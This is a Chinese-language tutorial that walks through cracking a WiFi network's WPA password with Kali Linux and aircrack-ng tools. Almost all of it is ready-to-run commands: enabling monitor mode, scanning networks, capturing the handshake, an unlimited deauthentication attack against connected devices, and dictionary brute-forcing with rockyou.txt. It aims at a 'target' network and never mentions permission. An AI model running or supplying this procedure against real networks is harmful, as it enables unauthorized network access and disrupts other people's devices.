0x01 准备工作
利用kali破解wifi密码,需要在虚拟机里安装kali系统,并购买一个支持监听的外置USB网卡!
0x02 开始
插入usb网卡并查看
打开kali虚拟机,插入usb无线网卡,选择连接kali虚拟机
打开终端输入:
iwconfig
查看无线网卡
airmon-ng
该命令列出了支持监控模式的无线网卡,如果没有任何输出,则表示无线网卡不支持监控模式。
记下Interface名称,开启网卡的监听模式
airmon-ng start wlan0
如果出现结果如下图,说明还有其他网卡处于监听状态,需要先将其关闭
airmon-ng check kill
再次开启监听模式,并记下其Interface
airmon-ng start wlan0
扫描信号
扫描附近的wifi信号
airodump-ng wlan0mon
找到自己的目标wifi后使用 Ctrl+c 中止
- BSSID AP端的mac地址
- PWR 信号强度(绝对值越小,信号越强)
- Data 对应路由器的在线数据吞吐量,数值越大,数值上传量越大
- CH 对应路由的频道
- ESSID 对应路由器的名称
抓取握手包
输入命令:
airodump-ng -c 6 -w ./test --bssid 24:16:6D:21:D1:E0 wlan0mon airodump-ng -c <AP信道> -w <抓取握手包后存放位置名称> --bssid <AP的mac地址> <interface名称>
这里需要有设备与路由传输数据才可以。
解除认证攻击
保持命令窗口处于运行状态,再打开一个新的命令窗口,进行解除认证攻击,即强制连接到目的wifi路由的设备重新连接。
aireplay-ng -0 0 -a 88:C3:97:31:E8:9D -c C0:EE:FB:4F:A2:7F wlan0mon aireplay-ng -<攻击模式,这里使用持续攻击(0)> [攻击次数,0为无限攻击] -a <AP端的MAC地址> -c <被攻击设备的MAC地址> <interface名称>
当下图所示位置显示 WPA hankshake 即成功抓到握手包,将两个命令框都输入 Ctrl + C 终止攻击和握手抓包。
关闭无线网卡监听模式
airmon-ng stop wlan0mon
0x03 使用字典暴力破解
kali自带有一份无线wifi密码字典,但是需要先解压
gzip -d /usr/share/wordlists/rockyou.txt.gz
爆破
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 88:C3:97:31:E8:9D test-01.cap aircrack-ng -w <指定字典> -b <目的路由MAC地址> <抓到的握手包>
爆破成功后,如图区域会显示 KEY FOUND![ 密码 ]
大功告成!!!